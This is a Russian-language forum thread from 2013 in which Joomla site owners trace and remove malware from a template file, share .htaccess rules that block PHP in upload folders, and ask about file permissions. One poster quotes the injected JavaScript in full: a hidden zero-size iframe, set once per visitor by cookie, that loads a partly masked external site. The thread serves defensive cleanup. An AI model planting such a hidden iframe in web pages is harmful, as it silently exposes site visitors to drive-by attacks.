бэкап делаете самостоятельно или у хостера просите? как лучше
попробуйте найти по тексту var ifn2i8N в файлах
кстати сегодня в панели гугл вебмастер тоже предупреждение о наличии кода, они указали полный путь к файлу где лежит вредоносный код
у меня хостинг другой. Может как то через код партнерки? Нашел по пути /папка сайта/templates/папка шаблона/javascript в файле с именем hide.js , строка 309
код вида var if9KRu = document.createElement('iframe');if9KRu.name = 'if9KRu';if9KRu.src = 'http://******
спасибо, все также стоят. Можете объяснить как реализовать следующее:
"все директории, в которые производится загрузка файлов или кэширование - делаем read-write и кладем в них волшебный .htaccess, который либо делает
deny from all
либо запрещает вызов php
Options -Indexes
php_flag engine 0
RemoveHandler .phtml .php .php3 .php4 .php5 .php6 .phps .cgi .exe .pl .asp .aspx .shtml .shtm .fcgi .fpl .jsp .htm .html .wml
AddType application/x-httpd-php-source .phtml .php .php3 .php4 .php5 .php6 .phps .cgi .exe .pl .asp .aspx .shtml .shtm .fcgi .fpl .jsp .htm .html .wml "
не подскажите какие права ставить на файлы и папки джумла для предотвращения несанкционированного доступа?
это из-за нее получается. У тебя также был в панели вебмастера "поведенческий анализ"?
кроме удаления партнерки ни как не исправить?---------- Добавлено 06.08.2013 в 17:10 ----------TF-Studio, удалил строку с фреймом в папке шаблона. Подскажите есть ли еще вредоносный код?
это код партнерки ред клик
нашел код
var if9KRu = document.createElement('iframe');if9KRu.name = 'if9KRu';if9KRu.src = 'http://*.la*tye.com/';if9KRu.style.width = '0px';if9KRu.style.height = '0px';window.onload = function() {if (document.cookie.indexOf('if9KRu=') == -1) {document.cookie = 'if9KRu=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT';document.getElementsByTagName('body')[0].appendChild(if9KRu);}};
это он?
Проблема решена.